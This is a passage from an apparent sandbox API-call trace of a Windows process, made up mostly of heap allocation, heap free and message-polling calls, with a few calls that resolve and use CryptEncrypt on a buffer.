hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0254.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9dc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0254.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.990] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0254.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6cd8 [0254.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0254.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0254.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0254.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0254.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0254.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0254.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0254.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0254.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0254.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0254.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0254.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.991] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x7dc5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x7dc8) returned 1 [0254.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0254.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0254.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0254.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0254.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0254.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0254.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0254.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0254.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0254.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0254.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0254.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0254.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0254.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0254.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0254.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0254.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0254.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0254.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0254.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0254.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0254.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0254.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0254.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0254.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0254.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0254.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0254.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.995] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0254.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0254.996] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.996] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0254.996] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0254.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0254.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.997] CharLowerBuffW (in: lpsz="byte[32200]", cchLength=0xb | out: lpsz="byte[32200]") returned 0xb [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0254.997] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0254.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.999] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0255.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0255.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0255.000] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.000] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0255.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0255.001] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.001] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.001] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0255.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0255.004] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0255.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.004] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24df3c0*, pdwDataLen=0x8bef68*=0x7dc5, dwBufLen=0x7dc8 | out: pbData=0x24df3c0*, pdwDataLen=0x8bef68*=0x7dc8) returned 1 [0255.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0255.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0255.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0255.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0255.005] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0255.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0255.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0255.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0255.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.007] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.007] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0255.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.008] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0255.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0255.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0255.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0255.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0255.010] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.010] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 